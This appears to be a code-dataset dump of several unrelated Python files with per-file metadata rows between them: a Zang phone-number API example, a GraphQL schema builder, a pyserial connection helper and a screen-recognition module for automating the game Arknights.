def _get_imports(self):
imports = {}
for dirpath, dirnames, filenames in os.walk(self._package_root):
for filename in filenames:
if not filename.endswith('.py'):
continue
file_path = os.path.join(dirpath, filename)
file_imports = ImportScanner(file_path).imports
for (lineno, line, name, _) in file_imports:
top_level_name = name.split('.', 1)[0]
imports.setdefault(
top_level_name,
collections.defaultdict(list)
)[file_path].append((lineno, line))
return imports
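

# Illustrative usage sketch (not part of the original module): scan one file,
# then aggregate top-level imports across a package tree. The paths are
# hypothetical.
if __name__ == '__main__':
    scanner = ImportScanner('example.py')
    for lineno, line, name, fromlist in scanner.imports:
        print('line %s imports %s' % (lineno, name))
    finder = ImportFinder('src')
    print(sorted(finder.import_data.keys()))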
| 33.398844 | 78 | 0.529768 | 654 | 5,778 | 4.437309 | 0.215596 | 0.026533 | 0.024121 | 0.023432 | 0.135424 | 0.100276 | 0.09235 | 0.05031 | 0.029635 | 0.029635 | 0 | 0.009645 | 0.371928 | 5,778 | 172 | 79 | 33.593023 | 0.790025 | 0.043268 | 0 | 0.144828 | 0 | 0 | 0.033951 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.089655 | false | 0 | 0.268966 | 0.006897 | 0.468966 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e10ebf4a1ecfea536bbf6435217933c9e044fd | 846 | py | Python | docs/examples/available_phone_numbers_example.py | vlastikczech/zang-python | 980f5243071404d6838554500a6955ff7bc2a0c7 | [
"MIT"
] | null | null | null | docs/examples/available_phone_numbers_example.py | vlastikczech/zang-python | 980f5243071404d6838554500a6955ff7bc2a0c7 | [
"MIT"
] | null | null | null | docs/examples/available_phone_numbers_example.py | vlastikczech/zang-python | 980f5243071404d6838554500a6955ff7bc2a0c7 | [
"MIT"
] | null | null | null | from zang.exceptions.zang_exception import ZangException
from zang.configuration.configuration import Configuration
from zang.connectors.connector_factory import ConnectorFactory
from zang.domain.enums.available_number_type import AvailableNumberType
from docs.examples.credentials import sid, authToken
url = 'http://api.zang.io/v2'
configuration = Configuration(sid, authToken, url=url)
availablePhoneNumbersConnector = ConnectorFactory(
configuration).availablePhoneNumbersConnector
try:
numbers = availablePhoneNumbersConnector.listAvailablePhoneNumbers(
country="HR",
type_=AvailableNumberType.TOLLFREE,
contains="123",
areaCode="052",
inRegion="Istria",
inPostalCode="52210",
page=0,
pageSize=20)
print(numbers.total)
except ZangException as ze:
print(ze)
| 31.333333 | 71 | 0.760047 | 82 | 846 | 7.780488 | 0.621951 | 0.050157 | 0.047022 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.021097 | 0.159574 | 846 | 26 | 72 | 32.538462 | 0.876231 | 0 | 0 | 0 | 0 | 0 | 0.047281 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.227273 | 0 | 0.227273 | 0.090909 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e2595b5bc5ce59dcbb7ca5c7d7107c02325fa1 | 20,931 | py | Python | polecat/graphql/schema.py | furious-luke/polecat | 7be5110f76dc42b15c922c1bb7d49220e916246d | [
"MIT"
] | 4 | 2019-08-10T12:56:12.000Z | 2020-01-21T09:51:20.000Z | polecat/graphql/schema.py | furious-luke/polecat | 7be5110f76dc42b15c922c1bb7d49220e916246d | [
"MIT"
] | 71 | 2019-04-09T05:39:21.000Z | 2020-05-16T23:09:24.000Z | polecat/graphql/schema.py | furious-luke/polecat | 7be5110f76dc42b15c922c1bb7d49220e916246d | [
"MIT"
] | null | null | null | import inspect
import logging
from functools import partial
from graphql.type import (GraphQLField, GraphQLInputField,
GraphQLInputObjectType, GraphQLInt, GraphQLList,
GraphQLNonNull, GraphQLObjectType, GraphQLSchema,
GraphQLString)
from polecat.model import default_blueprint
from ..core.context import active_context
from ..model import Model, omit
from ..utils import add_attribute, capitalize, uncapitalize
from ..utils.stringcase import camelcase
# from .field import * # noqa
from .registry import (add_graphql_create_input, add_graphql_type,
add_graphql_update_input, graphql_create_input_registry,
graphql_field_registry, graphql_reverse_input_registry,
graphql_type_registry, graphql_update_input_registry)
from .resolve import (resolve_all_query, resolve_create_mutation,
resolve_delete_mutation, resolve_get_query,
resolve_mutation, resolve_query, resolve_update_mutation,
resolve_update_or_create_mutation)
from .type import scalars, GraphQLJSON
logger = logging.getLogger(__name__)
def build_graphql_schema():
# TODO: I need to fix this nonsense. The registries need to be
# first-class citizens that can be cleared when needed.
global graphql_create_input_registry
global graphql_update_input_registry
global graphql_reverse_input_registry
all_keys = list(graphql_create_input_registry.keys())
for k in all_keys:
del graphql_create_input_registry[k]
all_keys = list(graphql_update_input_registry.keys())
for k in all_keys:
del graphql_update_input_registry[k]
all_keys = list(graphql_reverse_input_registry.keys())
for k in all_keys:
del graphql_reverse_input_registry[k]
return SchemaBuilder().build()
# TODO: Make the builders class only?
class SchemaBuilder:
def build(self):
logger.debug('Building GraphQL schema')
self.post_build_hooks = []
self.types = []
self.queries = {}
self.mutations = {}
self.build_models()
self.build_queries()
self.build_mutations()
self.run_post_build_hooks()
return GraphQLSchema(
query=GraphQLObjectType(
name='Query',
fields=self.queries
),
mutation=GraphQLObjectType(
name='Mutation',
fields=self.mutations
) if self.mutations else None,
types=scalars + self.types
)
# TODO: Should have called this "delete_input_type".
@property
def delete_type(self):
return self.build_delete_type()
@property
def delete_output_type(self):
return self.build_delete_output_type()
def build_models(self):
logger.debug('Building GraphQL models')
builders = []
for model in self.iter_models():
builder_class = getattr(model.Meta, 'builder', ModelBuilder)
builder = builder_class(self)
builder.build(model)
builders.append(builder)
for builder in builders:
builder.post_build(self)
def build_queries(self):
logger.debug('Building GraphQL queries')
for query in self.iter_queries():
builder_class = getattr(query, 'builder', QueryBuilder)
builder = builder_class(self)
builder.build(query)
def build_mutations(self):
logger.debug('Building GraphQL mutations')
for mutation in self.iter_mutations():
builder_class = getattr(mutation, 'builder', MutationBuilder)
builder = builder_class(self)
builder.build(mutation)
def iter_models(self):
for type in default_blueprint.iter_types():
if not type.Meta.omit == omit.ALL:
yield type
for model in default_blueprint.iter_models():
if not model.Meta.omit == omit.ALL:
yield model
def iter_queries(self):
for query in default_blueprint.iter_queries():
yield query
def iter_mutations(self):
for mutation in default_blueprint.iter_mutations():
yield mutation
def build_delete_type(self):
# TODO: Use a function cache.
type = getattr(self, '_delete_type', None)
if not type:
type = GraphQLInputObjectType(
name='DeleteByIDInput',
fields={
'id': GraphQLInputField(GraphQLInt)
}
)
self._delete_type = type
return type
def build_delete_output_type(self):
# TODO: Use a function cache.
type = getattr(self, '_delete_output_type', None)
if not type:
type = GraphQLObjectType(
name='DeleteByID',
fields={
'id': GraphQLField(GraphQLInt)
}
)
self._delete_output_type = type
return type
def run_post_build_hooks(self):
for hook in self.post_build_hooks:
hook()
class ModelBuilder:
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, model):
self.model = model
self.type = self.build_type(model)
self.schema_builder.types.append(self.type)
# TODO: Can remove `schema_builder`?
def post_build(self, schema_builder):
if issubclass(self.model, Model):
schema_builder.queries.update(self.build_queries(self.model, self.type))
schema_builder.mutations.update(self.build_mutations(self.model, self.type))
def build_type(self, model):
if getattr(model.Meta, 'input', False):
return InputBuilder(self.schema_builder).build(model)
else:
return TypeBuilder(self.schema_builder).build(model)
def build_queries(self, model, type):
# TODO: Add the model to the GraphQLField?
return {
**self.build_all_queries(model, type),
**self.build_get_queries(model, type)
}
def build_mutations(self, model, type):
mutations = {}
if not model.Meta.omit & omit.CREATE:
args = {}
create_input = CreateInputBuilder(self.schema_builder).build(model)
if create_input:
args['input'] = create_input
mutations[self.create_mutation_inflection(model)] = GraphQLField(
type,
args,
resolve_create_mutation
)
if not model.Meta.omit & omit.UPDATE:
args = {
'id': GraphQLNonNull(GraphQLInt)
}
update_input = UpdateInputBuilder(self.schema_builder).build(model)
if update_input:
args['input'] = update_input
mutations[self.update_mutation_inflection(model)] = GraphQLField(
type,
args,
resolve_update_mutation
)
if not model.Meta.omit & omit.UPDATE and not model.Meta.omit & omit.CREATE:
args = {
'id': GraphQLInt
}
if update_input:
args['input'] = update_input
mutations[self.update_or_create_mutation_inflection(model)] = GraphQLField(
type,
args,
resolve_update_or_create_mutation
)
if not model.Meta.omit & omit.DELETE:
# TODO: Need to use type instead of delete_output_type
# because it contains details about the model class
# used. Will need to think about how to handle situations
# where a type is shared amongst numerous models.
mutations[self.delete_mutation_inflection(model)] = GraphQLField(
type,
{
'input': DeleteInputBuilder(self.schema_builder).build(model)
},
resolve_delete_mutation
)
return mutations
def build_all_queries(self, model, type):
queries = {}
if not model.Meta.omit & omit.LIST:
queries[self.all_query_inflection(model)] = GraphQLField(
GraphQLList(type),
resolve=resolve_all_query
)
return queries
def build_get_queries(self, model, type):
queries = {}
if not model.Meta.omit & omit.GET:
# TODO: Need to add some details to the field to support
# getting by?
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.GET:
continue
if not field.use_get_query():
continue
queries[self.get_query_inflection(model, field)] = add_attribute(
GraphQLField(
type,
{
# TODO: What happens when the type linked is
# something complicated, like a GraphQLObject?
# Will need to use the PK of the
# relationship. What if there's several?
name: type.fields[name].type
},
resolve=resolve_get_query
),
'_type', type
)
return queries
def all_query_inflection(self, model):
# TODO: Not sure I need to capitalize?
return f'all{model.Meta.plural}'
def get_query_inflection(self, model, field):
name = f'get{model.Meta.name}'
if not field.primary_key:
name += f'By{capitalize(field.cc_name)}'
return name
def create_mutation_inflection(self, model):
return f'create{model.Meta.name}'
def update_mutation_inflection(self, model):
return f'update{model.Meta.name}'
def update_or_create_mutation_inflection(self, model):
return f'updateOrCreate{model.Meta.name}'
def delete_mutation_inflection(self, model):
return f'delete{model.Meta.name}'
class TypeBuilder:
object_type_class = GraphQLObjectType
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, model):
object_type_class = self.get_object_type_class()
# TODO: Description?
type = add_attribute(
object_type_class(
name=self.get_type_name(model),
fields=partial(self.build_all_fields, model)
),
'_model', model
)
# TODO: Current assumption is that there's just one gql type
# per model. May need to alter this in the future. I'm not
# storing any of the model create, update, etc inputs.
self.register_type(model, type)
return type
def get_type_name(self, model):
return model.Meta.name
def build_all_fields(self, model):
logger.debug(f'Building GraphQL fields for model {model.Meta.name} using builder {self.__class__.__name__}')
# TODO: Can I make this more functional?
fields = {}
for name, field in self.iter_fields(model):
result = self.build_field(model, field)
if isinstance(result, dict):
fields.update(result)
elif result is None:
pass
else:
fields[name] = result
self.add_hooks_from_field(model, field, name)
return fields
def add_hooks_from_field(self, model, field, field_name):
hooks = field.graphql_post_build_hooks
self.schema_builder.post_build_hooks.extend([
partial(h, self.schema_builder, model, field, field_name)
for h in hooks
])
def build_field(self, model, field):
for base_class in inspect.getmro(field.__class__):
my_graphql_field = graphql_field_registry.get(base_class)
# TODO: Nomenclature mishap here. Need a name for my
# GraphQL type abstraction that doesn't clash with actual
# graphql types.
if my_graphql_field:
logger.debug(f'Building field {field.cc_name}')
field = self.get_graphql_field(model, field, my_graphql_field)
logger.debug('DONE')
return field
raise Exception(f'unknown field type {field}')
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
return my_graphql_field(model, field).make_graphql_field(self.schema_builder)
def get_object_type_class(self):
return self.object_type_class
def register_type(self, model, type):
add_graphql_type(model, type)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & (omit.LIST | omit.GET):
continue
yield name, field
class InputBuilder(TypeBuilder):
object_type_class = GraphQLInputObjectType
def get_type_name(self, model):
# TODO: Probably shouldn't need this conditional.
name = model.Meta.name
if name[-5:] != 'Input':
name += 'Input'
return name
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
return my_graphql_field(model, field, input=True).make_graphql_field(self.schema_builder)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
yield name, field
class CreateInputBuilder(InputBuilder):
def get_type_name(self, model):
return f'{model.Meta.name}CreateInput'
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
# TODO: Have to pass in a type because reverse fields generate
# a new object-type internally instead of just a type, so it
# needs a name. So, if I don't pass in a type string create,
# update, delete will produce identically named object-types.
return my_graphql_field(
model,
field,
input=True,
registry=graphql_create_input_registry # TODO: Yuck
).make_graphql_field(self.schema_builder)
def register_type(self, model, type):
add_graphql_create_input(model, type)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.CREATE:
continue
yield name, field
class UpdateInputBuilder(InputBuilder):
def get_type_name(self, model):
return f'{model.Meta.name}UpdateInput'
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
# TODO: Check if it's not the ID field used for the update,
# and if not, make the field optional.
# TODO: Have to pass in a type because reverse fields generate
# a new object-type internally instead of just a type, so it
# needs a name. So, if I don't pass in a type string create,
# update, delete will produce identically named object-types.
return my_graphql_field(
model,
field,
input=True,
registry=graphql_update_input_registry # TODO: Yuck
).make_graphql_field(self.schema_builder)
def register_type(self, model, type):
add_graphql_update_input(model, type)
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.UPDATE:
continue
if name == 'id':
continue
yield name, field
class DeleteInputBuilder(InputBuilder):
def build(self, model):
object_type_class = self.get_object_type_class()
# TODO: Description?
type = add_attribute(
object_type_class(
name=self.get_type_name(model),
fields={
'id': GraphQLInt
}
),
'_model', model
)
# TODO: Current assumption is that there's just one gql type
# per model. May need to alter this in the future. I'm not
# storing any of the model create, update, etc inputs.
# self.register_type(model, type)
return type
def get_type_name(self, model):
return f'{model.Meta.name}DeleteInput'
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field.omit & omit.DELETE:
continue
yield name, field
class ReverseModelInputBuilder(InputBuilder):
def build(self, model, source_field):
# TODO: Do I need to pass source_field around, or okay to
# store on the builder?
self.source_field = source_field
logger.debug(f'Building GraphQL reverse model input {self.get_type_name(model)}')
return super().build(model)
def get_graphql_field(self, model, field, my_graphql_field):
# TODO: Maybe remove the function call and do it in __init__?
# TODO: Check if it's not the ID field used for the update,
# and if not, make the field optional.
# TODO: Have to pass in a type because reverse fields generate
# a new object-type internally instead of just a type, so it
# needs a name. So, if I don't pass in a type string create,
# update, delete will produce identically named object-types.
return my_graphql_field(
model,
field,
input=True,
registry=graphql_create_input_registry # TODO: Yuck
).make_graphql_field(self.schema_builder)
def get_type_name(self, model):
return f'{model.Meta.name}{capitalize(self.source_field.cc_name)}ReverseInput'
def iter_fields(self, model):
for name, field in model.Meta.cc_fields.items():
if field != self.source_field:
yield name, field
class QueryBuilder:
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, query):
self.schema_builder.queries.update(self.build_queries(query))
def build_queries(self, query):
queries = {}
if not query.Meta.omit & omit.ALL:
queries[self.query_inflection(query)] = add_attribute(
GraphQLField(
self.build_return_type(query),
self.build_arguments(query),
resolve_query
),
'_query', query
)
return queries
def build_return_type(self, query):
if isinstance(query.returns, list):
return GraphQLList(graphql_type_registry[query.returns[0]])
else:
return graphql_type_registry[query.returns]
def build_arguments(self, query):
args = {}
for name, type in getattr(query, 'arguments', ()):
# TODO: This should be looking up from a table.
args[camelcase(name)] = self.map_type(type)
return args
def map_type(self, type):
if type == str:
return GraphQLString
elif type == int:
return GraphQLInt
elif type == dict:
return GraphQLJSON
else:
raise NotImplementedError(f'invalid GraphQL argument: {type}')
def query_inflection(self, query):
return uncapitalize(query.Meta.name)
class MutationBuilder:
def __init__(self, schema_builder):
self.schema_builder = schema_builder
def build(self, mutation):
self.schema_builder.mutations.update(self.build_mutations(mutation))
def build_mutations(self, mutation):
mutations = {}
if not mutation.omit & omit.ALL:
mutations[self.mutation_inflection(mutation)] = add_attribute(
GraphQLField(
self.build_return_type(mutation),
{
'input': graphql_type_registry[mutation.input]
} if mutation.input else None,
resolve_mutation
),
'_mutation', mutation
)
return mutations
def mutation_inflection(self, mutation):
return uncapitalize(mutation.name)
def build_return_type(self, mutation):
if isinstance(mutation.returns, list):
return GraphQLList(graphql_type_registry[mutation.returns[0]])
else:
return graphql_type_registry[mutation.returns]
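

# Illustrative usage sketch (not part of the original module): build the
# schema from the default blueprint and execute a trivial query with
# graphql-core. The query string is hypothetical.
def _example_execute():
    from graphql import graphql_sync

    schema = build_graphql_schema()
    result = graphql_sync(schema, '{ __typename }')
    return result.data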
| 36.150259 | 116 | 0.605848 | 2,398 | 20,931 | 5.084237 | 0.109675 | 0.031004 | 0.033465 | 0.010499 | 0.487123 | 0.414534 | 0.383694 | 0.328986 | 0.29831 | 0.29831 | 0 | 0.00021 | 0.316564 | 20,931 | 578 | 117 | 36.212803 | 0.85208 | 0.134298 | 0 | 0.318078 | 0 | 0.002288 | 0.047018 | 0.01966 | 0 | 0 | 0 | 0.00173 | 0 | 1 | 0.153318 | false | 0.002288 | 0.02746 | 0.048055 | 0.315789 | 0.011442 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e389fcfd8d1aa1b9f1d1b2df530b8b2034fbc2 | 5,222 | py | Python | Serial-Tool/Utils/SerialHelper.py | summDy/Python | 54dc33d042fea010460f2a77f443890b1cbb3069 | [
"Unlicense"
] | null | null | null | Serial-Tool/Utils/SerialHelper.py | summDy/Python | 54dc33d042fea010460f2a77f443890b1cbb3069 | [
"Unlicense"
] | null | null | null | Serial-Tool/Utils/SerialHelper.py | summDy/Python | 54dc33d042fea010460f2a77f443890b1cbb3069 | [
"Unlicense"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys
import time
import serial
import logging
import binascii
import platform
import threading
if platform.system() == "Windows":
from serial.tools import list_ports
else:
import glob, os, re
class SerialHelper(object):
def __init__(self, Port="COM6", BaudRate="9600", ByteSize="8", Parity="N", Stopbits="1"):
'''
        Initialize serial port parameters.
'''
self.port = Port
self.baudrate = BaudRate
self.bytesize = ByteSize
self.parity = Parity
self.stopbits = Stopbits
self.threshold_value = 1
self.receive_data = ""
self._serial = None
self._is_connected = False
def connect(self, timeout=2):
'''
        Connect to the serial device.
'''
self._serial = serial.Serial()
self._serial.port = self.port
self._serial.baudrate = self.baudrate
self._serial.bytesize = int(self.bytesize)
self._serial.parity = self.parity
self._serial.stopbits = int(self.stopbits)
self._serial.timeout = timeout
try:
self._serial.open()
if self._serial.isOpen():
self._is_connected = True
except Exception as e:
self._is_connected = False
logging.error(e)
def disconnect(self):
'''
        Close the serial connection.
'''
if self._serial:
self._serial.close()
def write(self, data, isHex=False):
        '''
        Send data to the serial device.
        '''
        if self._is_connected:
            if isHex:
                data = binascii.unhexlify(data)
            elif isinstance(data, str):
                # bytes(str) needs an encoding on Python 3; encode explicitly
                data = data.encode()
            self._serial.write(data)
def on_connected_changed(self, func):
'''
set serial connected status change callback
'''
tConnected = threading.Thread(target=self._on_connected_changed, args=(func, ))
tConnected.setDaemon(True)
tConnected.start()
def _on_connected_changed(self, func):
'''
set serial connected status change callback
'''
self._is_connected_temp = False
while True:
if platform.system() == "Windows":
for com in list_ports.comports():
if com[0] == self.port:
self._is_connected = True
break
elif platform.system() == "Linux":
if self.port in self.find_usb_tty():
self._is_connected = True
if self._is_connected_temp != self._is_connected:
func(self._is_connected)
self._is_connected_temp = self._is_connected
time.sleep(0.8)
def on_data_received(self, func):
'''
        set serial data received callback
'''
tDataReceived = threading.Thread(target=self._on_data_received, args=(func, ))
tDataReceived.setDaemon(True)
tDataReceived.start()
def _on_data_received(self, func):
'''
        set serial data received callback
'''
while True:
if self._is_connected:
try:
number = self._serial.inWaiting()
if number > 0:
data = self._serial.read(number)
if data:
func(data)
except Exception as e:
self._is_connected = False
self._serial = None
break
def find_usb_tty(self, vendor_id=None, product_id=None):
'''
        Find USB serial (ttyUSB) devices on Linux.
'''
tty_devs = list()
for dn in glob.glob('/sys/bus/usb/devices/*') :
try:
vid = int(open(os.path.join(dn, "idVendor" )).read().strip(), 16)
pid = int(open(os.path.join(dn, "idProduct")).read().strip(), 16)
if ((vendor_id is None) or (vid == vendor_id)) and ((product_id is None) or (pid == product_id)) :
dns = glob.glob(os.path.join(dn, os.path.basename(dn) + "*"))
for sdn in dns :
for fn in glob.glob(os.path.join(sdn, "*")) :
if re.search(r"\/ttyUSB[0-9]+$", fn) :
tty_devs.append(os.path.join("/dev", os.path.basename(fn)))
except Exception as ex:
pass
return tty_devs
class testHelper(object):
def __init__(self):
self.myserial = SerialHelper(Port="COM3", BaudRate="115200")
self.myserial.on_connected_changed(self.myserial_on_connected_changed)
def write(self, data):
self.myserial.write(data, True)
def myserial_on_connected_changed(self, is_connected):
if is_connected:
print("Connected")
self.myserial.connect()
self.myserial.on_data_received(self.myserial_on_data_received)
else:
print("DisConnected")
def myserial_on_data_received(self, data):
print(data)
if __name__ == '__main__':
myserial = testHelper()
time.sleep(1)
myserial.write("7EF9010000FA7E")
count = 0
while count < 9:
print("Count: %s"%count)
time.sleep(1)
count += 1
| 30.717647 | 115 | 0.54098 | 566 | 5,222 | 4.789753 | 0.259717 | 0.059019 | 0.082995 | 0.03246 | 0.261527 | 0.1564 | 0.142383 | 0.1173 | 0.089266 | 0.089266 | 0 | 0.012094 | 0.350823 | 5,222 | 169 | 116 | 30.899408 | 0.787611 | 0.046151 | 0 | 0.208333 | 0 | 0 | 0.031852 | 0.00461 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108333 | false | 0.008333 | 0.075 | 0 | 0.208333 | 0.033333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e8e957df229ac4b7349bcbeff3fbe7dd1dc79e5b | 8,607 | py | Python | arknights_mower/utils/recognize.py | rebelice/arknights-mower | 1ad7f452179253211596efe27e778a62526c9a96 | [
"MIT"
] | null | null | null | arknights_mower/utils/recognize.py | rebelice/arknights-mower | 1ad7f452179253211596efe27e778a62526c9a96 | [
"MIT"
] | null | null | null | arknights_mower/utils/recognize.py | rebelice/arknights-mower | 1ad7f452179253211596efe27e778a62526c9a96 | [
"MIT"
] | null | null | null | import numpy as np
import cv2
from ..__init__ import __rootdir__
from . import config, detector
from .log import logger, save_screenshot
from .scene import Scene, SceneComment
from .image import bytes2img, loadimg, threshole
from .matcher import Matcher
class RecognizeError(Exception):
pass
class Recognizer():
def __init__(self, adb, debug_screencap=None):
self.adb = adb
self.update(debug_screencap)
def update(self, debug_screencap=None, matcher=True):
while True:
try:
if debug_screencap is not None:
self.screencap = debug_screencap
else:
self.screencap = self.adb.screencap()
self.img = bytes2img(self.screencap)
self.gray = bytes2img(self.screencap, True)
self.h, self.w, _ = self.img.shape
self.matcher = Matcher(self.gray) if matcher else None
self.scene = Scene.UNDEFINED
break
except cv2.error as e:
logger.warning(e)
continue
def color(self, x, y):
return self.img[y][x]
def get_scene(self):
if self.scene != Scene.UNDEFINED:
return self.scene
if self.find('index_nav', thres=250, scope=((0, 0), (100+self.w//4, self.h//10))) is not None:
self.scene = Scene.INDEX
elif self.find('nav_index') is not None:
self.scene = Scene.NAVIGATION_BAR
elif self.find('materiel_ico') is not None:
self.scene = Scene.MATERIEL
elif self.find('read_mail') is not None:
self.scene = Scene.MAIL
elif self.find('loading') is not None:
self.scene = Scene.LOADING
elif self.find('loading2') is not None:
self.scene = Scene.LOADING
elif self.find('loading3') is not None:
self.scene = Scene.LOADING
elif self.find('loading4') is not None:
self.scene = Scene.LOADING
elif self.is_black():
self.scene = Scene.LOADING
elif self.find('ope_plan') is not None:
self.scene = Scene.OPERATOR_BEFORE
elif self.find('ope_select_start') is not None:
self.scene = Scene.OPERATOR_SELECT
elif self.find('ope_agency_going') is not None:
self.scene = Scene.OPERATOR_ONGOING
elif self.find('ope_elimi_finished') is not None:
self.scene = Scene.OPERATOR_ELIMINATE_FINISH
elif self.find('ope_finish') is not None:
self.scene = Scene.OPERATOR_FINISH
elif self.find('ope_recover_potion_on') is not None:
self.scene = Scene.OPERATOR_RECOVER_POTION
elif self.find('ope_recover_originite_on') is not None:
self.scene = Scene.OPERATOR_RECOVER_ORIGINITE
elif self.find('double_confirm') is not None:
self.scene = Scene.DOUBLE_CONFIRM
elif self.find('ope_firstdrop') is not None:
self.scene = Scene.OPERATOR_DROP
elif self.find('ope_eliminate') is not None:
self.scene = Scene.OPERATOR_ELIMINATE
elif self.find('ope_giveup') is not None:
self.scene = Scene.OPERATOR_GIVEUP
elif self.find('friend_list_on') is not None:
self.scene = Scene.FRIEND_LIST_ON
elif self.find('credit_visiting') is not None:
self.scene = Scene.FRIEND_VISITING
elif self.find('infra_overview') is not None:
self.scene = Scene.INFRA_MAIN
elif self.find('infra_todo') is not None:
self.scene = Scene.INFRA_TODOLIST
elif self.find('clue') is not None:
self.scene = Scene.INFRA_CONFIDENTIAL
elif self.find('infra_overview_in') is not None:
self.scene = Scene.INFRA_ARRANGE
elif self.find('hidden_eye', thres=250, scope=((self.w//4*3, self.h//4*3), (self.w, self.h))) is not None:
self.scene = Scene.INFRA_DETAILS
elif self.find('friend_list') is not None:
self.scene = Scene.FRIEND_LIST_OFF
elif self.find("mission_trainee_on") is not None:
self.scene = Scene.MISSION_TRAINEE
elif self.find('mission_daily_on') is not None:
self.scene = Scene.MISSION_DAILY
elif self.find('mission_weekly_on') is not None:
self.scene = Scene.MISSION_WEEKLY
elif self.find('terminal_pre') is not None:
self.scene = Scene.TERMINAL_MAIN
elif self.find('open_recruitment') is not None:
self.scene = Scene.RECRUIT_MAIN
elif self.find('recruiting_instructions') is not None:
self.scene = Scene.RECRUIT_TAGS
elif self.find('agent_token') is not None:
self.scene = Scene.RECRUIT_AGENT
elif self.find('agent_token_1080_1440') is not None:
self.scene = Scene.RECRUIT_AGENT
elif self.find('agent_token_900_1440') is not None:
self.scene = Scene.RECRUIT_AGENT
elif self.find('agent_unlock') is not None:
self.scene = Scene.SHOP_CREDIT
elif self.find('shop_credit_2') is not None:
self.scene = Scene.SHOP_OTHERS
elif self.find('shop_cart') is not None:
self.scene = Scene.SHOP_CREDIT_CONFIRM
elif self.find('login_awake') is not None:
self.scene = Scene.LOGIN_QUICKLY
elif self.find('login_account') is not None:
self.scene = Scene.LOGIN_MAIN
elif self.find('login_loading') is not None:
self.scene = Scene.LOGIN_LOADING
elif self.find('login_iknow') is not None:
self.scene = Scene.LOGIN_ANNOUNCE
elif self.find('12cadpa') is not None:
self.scene = Scene.LOGIN_START
elif detector.announcement_close(self.img) is not None:
self.scene = Scene.ANNOUNCEMENT
elif self.find('skip') is not None:
self.scene = Scene.SKIP
elif self.find('upgrade') is not None:
self.scene = Scene.UPGRADE
elif detector.confirm(self.img) is not None:
self.scene = Scene.CONFIRM
elif self.find('login_captcha') is not None:
self.scene = Scene.LOGIN_INPUT
elif self.find('main_theme') is not None:
self.scene = Scene.TERMINAL_MAIN_THEME
elif self.find('episode') is not None:
self.scene = Scene.TERMINAL_EPISODE
elif self.find('biography') is not None:
self.scene = Scene.TERMINAL_BIOGRAPHY
elif self.find('collection') is not None:
self.scene = Scene.TERMINAL_COLLECTION
elif self.find('loading6') is not None:
self.scene = Scene.LOADING
else:
self.scene = Scene.UNKNOWN
# save screencap to analyse
if config.SCREENSHOT_PATH is not None:
save_screenshot(
self.screencap, subdir=f'{self.scene}/{self.h}x{self.w}')
logger.info(f'Scene: {self.scene}: {SceneComment[self.scene]}')
return self.scene
def is_black(self):
return np.max(self.gray[:, 105:-105]) < 16
def find(self, item, draw=False, scope=None, thres=None, judge=True):
logger.debug(f'find {item}')
if thres is not None:
image = threshole(
loadimg(f'{__rootdir__}/resources/{item}.png'), thres)
matcher = Matcher(
threshole(self.gray[scope[0][1]:scope[1][1], scope[0][0]:scope[1][0]], thres))
ret = matcher.match(image, draw=draw, judge=judge)
else:
image = loadimg(f'{__rootdir__}/resources/{item}.png')
matcher = self.matcher
ret = matcher.match(image, draw=draw, scope=scope, judge=judge)
if ret is None:
return None
return ret
def score(self, item, draw=False, scope=None, thres=None):
logger.debug(f'score {item}')
if thres is not None:
image = threshole(
loadimg(f'{__rootdir__}/resources/{item}.png'), thres)
matcher = Matcher(
threshole(self.gray[scope[0][1]:scope[1][1], scope[0][0]:scope[1][0]], thres))
ret = matcher.score(image, draw=draw)
else:
image = loadimg(f'{__rootdir__}/resources/{item}.png')
matcher = self.matcher
ret = matcher.score(image, draw=draw, scope=scope)
if ret is None:
return None
return ret[1:]
def nav_button(self):
return self.find('nav_button', thres=128, scope=((0, 0), (100+self.w//4, self.h//10)))
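

# Illustrative usage sketch (not part of the original module): any client
# exposing a screencap() method that returns PNG bytes can stand in for the
# adb object expected by Recognizer.
def _example_scene(adb_client):
    recog = Recognizer(adb_client)
    return recog.get_scene()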
